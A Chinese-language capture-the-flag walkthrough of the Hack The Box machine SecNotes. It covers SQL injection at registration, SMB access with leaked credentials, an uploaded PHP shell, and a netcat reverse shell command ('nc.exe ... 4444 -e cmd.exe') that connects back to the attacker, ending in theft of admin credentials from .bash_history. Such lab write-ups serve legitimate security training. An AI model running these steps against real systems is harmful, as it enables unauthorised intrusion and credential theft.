【Hackthebox】【SecNotes】

这次靶机是hackthebox里的SecNotes

靶机IP地址:10.10.10.97 

==========================================================================================

信息收集

nmap -sV -sC -T5 10.10.10.97

发现靶机开放了80端口和445端口

 

 

访问下80端口

是一个登陆页面，我们点击【Sign up now】来注册下账号，并登陆

 

登陆后，我们遇到一堆按钮，一个警告（个人信息泄露），同时也显示了我们的用户名

这里我们可以试着 CSRF,XSS,SQL注入等这些安全问题

 

我们试着SQL注入，我们重新回到账号注册页面

重新注册一个账号

进入页面时候，跳出一个窗口和一堆数据，说明是存在SQL注入的

 

其他的信息都不是很重要，重要的是这个【New Site】

靶机开了SMB服务，这个应该就是账号和密码了

使用smbclient登陆

smbclient //10.10.10.97/new-site -U "tyler"

用户名：tyler

密码：92g!mA8BGjOirkL%OG*&

 

我们查看下共享的内容

 看到一些跟网页有关的东西，但是似乎是跟我们从80上看到的内容是不一样的

 

我们试着从把全部端口扫描下看看，

 

我们访问下8808

是一个iis默认的页面

查看源码，我们也可以看到它引用的就是smb列出里面的png图片

然后我们通过上传一个php反弹shell

 

然后我们put rec.php

我们还要put个nc上去

 

在我们的Kali上要监听端口

然后访问10.10.10.97:8808/rec.php?cmd=nc.exe 10.10.10.15.xx 4444 -e cmd.exe

得到shell

然后我们 切换到 用户目录下dir下

type下得到user flag

 

在刚刚dir我们发现一个很有趣的东西 bash.link

一个链接

 

这台机器上装了linux的子系统，我们找下bash的具体位置

 

我们cd 到Windows目录下用dir查找下

dir *.exe /b/s | findstr bash

/b：不显示修改日期等信息，只显示文件名

/s：显示指定目录和所有子目录中的文件

 

我们cd过去然后执行bash.exe

我们用python pty得到一个稳定的shell

python -c "import pty;pty.spawn('/bin/bash')"

我们查看下.bash_history的内容

我们得到了管理员的smb账号密码，然后我们登录下

 

我们一步步cd到root的Desktop然后dir发现root.txt

然后get root.txt 最后退出smb服务 读取刚刚获取的root.txt的文件内容